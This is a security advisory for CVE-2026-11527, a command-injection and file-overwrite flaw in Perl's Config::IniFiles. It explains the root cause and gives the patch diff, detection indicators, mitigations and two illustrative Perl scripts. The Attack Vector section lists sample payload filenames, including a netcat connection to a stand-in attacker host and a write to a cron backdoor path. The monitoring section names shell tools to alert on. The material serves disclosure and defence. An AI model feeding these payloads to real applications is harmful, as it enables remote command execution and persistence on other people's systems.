CVE-2026-11527 Overview
CVE-2026-11527 affects Config::IniFiles versions before 3.001000 for Perl. The module exposes an OS command injection and file overwrite flaw through its _make_filehandle helper. The helper uses Perl's 2-argument open() to process the documented -file argument. When a caller forwards untrusted input, a filename beginning or ending with | is run as a shell command, and a filename starting with > or >> truncates or appends to an arbitrary file instead of being read. The flaw is classified under CWE-73: External Control of File Name or Path.
Critical Impact
Any application that passes untrusted input to Config::IniFiles->new(-file => ...) can execute arbitrary commands or overwrite files under the process UID.
Affected Products
- Config::IniFiles for Perl, all versions before 3.001000
- Applications invoking new(-file => $thing) or ReadConfig with attacker-controlled paths
- Perl distributions and CPAN-based deployments shipping the vulnerable module
Discovery Timeline
- 2026-06-14 - Public disclosure via OpenWall oss-security list
- 2026-06-14 - CVE-2026-11527 published to NVD
- 2026-06-17 - Last updated in NVD database
Technical Details for CVE-2026-11527
Vulnerability Analysis
The vulnerability resides in Config::IniFiles::_make_filehandle, the open path behind the -file argument. The helper invokes Perl's 2-argument open() form, which interprets shell-magic prefixes and suffixes in filenames. A filename like "touch /tmp/pwned |" causes Perl to execute the command through the shell. A filename like "> /etc/target" truncates the named file rather than opening it for reading. The attack requires local access with user interaction, but yields high impact on confidentiality, integrity, and availability. An in-memory scalar reference passed as -file => \$text is unaffected because no path is opened.
Root Cause
Perl's 2-argument open($fh, $thing) interprets $thing as a mode-bearing expression. Leading or trailing | characters trigger command execution. Leading > or >> characters open the path for writing. The fix replaces the call with the 3-argument form open($fh, '<', $thing), which forces read-only file semantics and treats the argument as a literal pathname.
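The following script is an added demonstration of the root cause, not code from the page or from Config::IniFiles. It works in a throwaway directory on a Unix filesystem (the fixture filename contains a '>' character), exercises only the redirect form of the 2-argument open() and deliberately never the pipe form, and compares it with the 3-argument form the fix adopts. The fixture name "> note.txt" and the functions read_2arg and read_3arg are constructed for this example.

```perl
#!/usr/bin/perl
# Added demonstration: how 2-arg open() reinterprets a filename as a mode,
# and why the 3-arg form with an explicit '<' does not.
use strict;
use warnings;
use File::Temp qw(tempdir);
use Cwd qw(getcwd);

my $scratch = tempdir(CLEANUP => 1);
my $orig    = getcwd();
chdir $scratch or die "chdir: $!";

# Constructed fixture: a real file whose literal name begins with '>'.
# A caller means "read this file"; 2-arg open() hears "truncate note.txt".
my $hostile_name = '> note.txt';
open(my $mk, '>', $hostile_name) or die "create fixture: $!";
print {$mk} "key=expected\n";
close $mk;

# Opens $name the way the patched _make_filehandle does: 3-arg, read-only,
# the string is a literal pathname.
sub read_3arg {
    my ($name) = @_;
    open(my $fh, '<', $name) or return "open failed: $!";
    my $line = <$fh>;
    close $fh;
    chomp $line if defined $line;
    return defined $line ? $line : '(nothing read)';
}

# Opens $name the way the vulnerable code did: 2-arg, mode parsed out of the
# string itself. For '> note.txt' this opens note.txt for writing.
sub read_2arg {
    my ($name) = @_;
    no warnings 'io';    # reading a write-only handle yields undef; keep it quiet
    open(my $fh, $name) or return "open failed: $!";
    my $line = <$fh>;
    close $fh;
    return defined $line ? $line : '(nothing read)';
}

printf "note.txt present before any open? %s\n", -e 'note.txt' ? 'yes' : 'no';
printf "3-arg open read: %s\n", read_3arg($hostile_name);
printf "2-arg open read: %s\n", read_2arg($hostile_name);
printf "note.txt present after 2-arg open? %s\n", -e 'note.txt' ? 'yes' : 'no';

# 2-arg open() strips leading and trailing whitespace before looking for the
# mode, so a naive "does it start with '>'" check is not a sufficient guard.
unlink 'note.txt';
read_2arg("   > note.txt   ");
printf "whitespace-padded name still truncates? %s\n", -e 'note.txt' ? 'yes' : 'no';

chdir $orig;    # leave the scratch dir so CLEANUP can remove it
```

The 3-arg call returns the fixture's line because '<' is fixed as the mode and the whole string is the filename; the 2-arg call returns nothing and leaves a newly created note.txt behind, and the whitespace-padded variant does the same. The last point matters for any input filter placed in front of the module: it must trim the string before testing prefixes and suffixes.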
Attack Vector
An attacker who controls the value passed to -file can supply payloads such as "id |", "| nc attacker 4444", or "> /etc/cron.d/backdoor". The injected command runs with the privileges of the Perl process. Web applications, CLI tools, and configuration loaders that accept user-supplied paths are the primary exposure surface.
my $fh = qualify_to_ref( $thing, caller(1) );
return $fh if defined( fileno $fh );
- # otherwise treat it as a file to open
+ # otherwise treat it as a file to open; 3-arg open so the filename is
+ # not interpreted as a command or redirect
$fh = gensym;
- open( $fh, $thing ) || return;
+ open( $fh, '<', $thing ) || return;
return $fh;
} # end _make_filehandle
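Review bot: the switch to open( $fh, '<', $thing ) also changes behaviour for two inputs the 2-arg form honoured, which the comment above the call does not mention: -file => '-' no longer reads STDIN but looks for a file literally named '-', and a caller passing an explicit '< path' now gets a literal path beginning with '<'. If any documented callers rely on either, the Changes entry should say so and point them at passing an already-open filehandle, which the fileno check two lines above this hunk's open already accepts.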
Source: GitHub Commit Patch
The patch converts the unsafe 2-argument open() to the safe 3-argument form, eliminating shell-magic interpretation.
Detection Methods for CVE-2026-11527
Indicators of Compromise
- Unexpected child processes spawned by Perl interpreters processing INI configuration files
- Files created or truncated under paths matching -file argument values supplied at runtime
- Audit log entries showing Config::IniFiles callers passing strings containing |, >, or >> characters
- Outbound network connections originating from Perl processes that normally only read configuration
Detection Strategies
- Inventory all Perl applications and CPAN dependencies to identify uses of Config::IniFiles below version 3.001000
- Static-analyze Perl source for calls to Config::IniFiles->new(-file => ...) where the value derives from request parameters, environment variables, or file uploads
- Review process-execution telemetry for shell invocations whose parent is a Perl process loading INI files
Monitoring Recommendations
- Alert on Perl processes spawning shells (/bin/sh, /bin/bash) or common payload binaries (nc, curl, wget)
- Monitor file integrity on sensitive paths writable by service accounts that run Perl-based applications
- Capture command-line arguments for Perl invocations to detect -file parameters containing pipe or redirect metacharacters
How to Mitigate CVE-2026-11527
Immediate Actions Required
- Upgrade Config::IniFiles to version 3.001000 or later via CPAN on all systems
- Audit application code that forwards user-supplied input into the -file argument and reject values containing |, >, or < characters
- Restrict the privileges of Perl processes that consume INI files so successful exploitation yields limited impact
- Where feasible, switch callers to the unaffected in-memory form -file => \$text when content is already loaded
Patch Information
The maintainer released Config::IniFiles 3.001000 with commit 3e48f9627fbba4dae5de35be1f735cdeb7e47fb8. The fix replaces the 2-argument open() in _make_filehandle with the 3-argument form. See the MetaCPAN Release Changes and the OpenWall OSS Security Post for the upstream advisory.
Workarounds
- Validate and canonicalize all path inputs before passing them to Config::IniFiles, rejecting strings beginning or ending with shell metacharacters
- Open the file in the caller and pass a filehandle or scalar reference instead of a raw path
- Apply mandatory access controls (AppArmor, SELinux) to confine Perl processes loading INI files
# Configuration example: upgrade via cpanm and verify version
cpanm Config::IniFiles@3.001000
perl -MConfig::IniFiles -e 'print "$Config::IniFiles::VERSION\n"'
# Input validation guard in calling code. 2-arg open() trims surrounding whitespace
# before looking for a mode, so trim first; reject a leading <, >, + or |, a trailing |,
# and the bare "-" that means STDIN.
perl -e 'my $f = shift; $f =~ s/^\s+|\s+$//g; die "unsafe path\n" if $f =~ /^[<>+|]|\|$/ || $f eq "-"; print "ok\n"' -- "$USER_INPUT"
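As an added example that is not the module's own code, the script below combines the workarounds listed above into one caller-side routine: it refuses strings that 2-arg open() would parse as a mode or pipe (after trimming whitespace the way open() does), confines the resolved path to an allowed directory with realpath(), opens the file read-only in the caller, and hands Config::IniFiles a filehandle so the module's own open() is never reached. The function name open_confined_ini, the fixture directory and the sample inputs are constructed for this example; the Config::IniFiles call is skipped if the module is not installed.

```perl
#!/usr/bin/perl
# Added example: confine and pre-open the INI path in the caller, then pass
# Config::IniFiles a filehandle instead of a raw string.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Returns an open read-only filehandle for $candidate if it resolves to a
# regular file strictly inside $base_dir; dies with a reason otherwise.
sub open_confined_ini {
    my ($candidate, $base_dir) = @_;
    die "empty path\n" unless defined $candidate && length $candidate;

    # Reject anything 2-arg open() would treat as a mode or a pipe. The 3-arg
    # open below never interprets these, so this is defence in depth whose
    # real value is an unambiguous log line when someone tries it.
    (my $trimmed = $candidate) =~ s/^\s+|\s+$//g;
    die "path uses open() metacharacters: $candidate\n"
        if $trimmed =~ /^[<>+|]/ || $trimmed =~ /\|$/ || $trimmed eq '-';

    # Resolve '..' and symlinks before the containment check; string-level
    # checks on the raw input are not a substitute for this.
    my $base = realpath($base_dir) or die "bad base dir: $base_dir\n";
    my $abs  = File::Spec->rel2abs($trimmed, $base);
    my $real = realpath($abs) or die "no such file: $candidate\n";

    die "path escapes $base: $candidate\n" unless index($real, "$base/") == 0;
    die "not a regular file: $candidate\n" unless -f $real;

    open(my $fh, '<', $real) or die "open $real: $!\n";
    return $fh;
}

# --- constructed fixtures so the script runs stand-alone ---
my $conf_dir = tempdir(CLEANUP => 1);
open(my $w, '>', "$conf_dir/app.ini") or die "fixture: $!";
print {$w} "[main]\nname=demo\n";
close $w;

for my $input ('app.ini', '../../etc/passwd', '> app.ini', 'nonexistent.ini') {
    my $fh = eval { open_confined_ini($input, $conf_dir) };
    if (!$fh) {
        printf "%-20s -> rejected: %s", $input, $@;
        next;
    }
    # Config::IniFiles accepts an already-open handle via -file; its
    # _make_filehandle returns it as soon as fileno() succeeds, so the
    # module never opens a path of its own.
    if (eval { require Config::IniFiles; 1 }) {
        my $cfg = Config::IniFiles->new(-file => $fh);
        printf "%-20s -> ok, name=%s\n", $input,
            $cfg ? $cfg->val('main', 'name') : '(parse error)';
    } else {
        printf "%-20s -> ok (Config::IniFiles not installed; handle is readable)\n", $input;
    }
    close $fh;
}
```

Only app.ini is accepted; the traversal attempt is rejected by the containment check after realpath() resolves it (or as missing where the target does not exist), the redirect-prefixed name is rejected by the metacharacter check, and the missing file by the existence check. Because the module only ever sees a filehandle, this approach is safe on the unpatched version as well and remains correct after upgrading.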
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

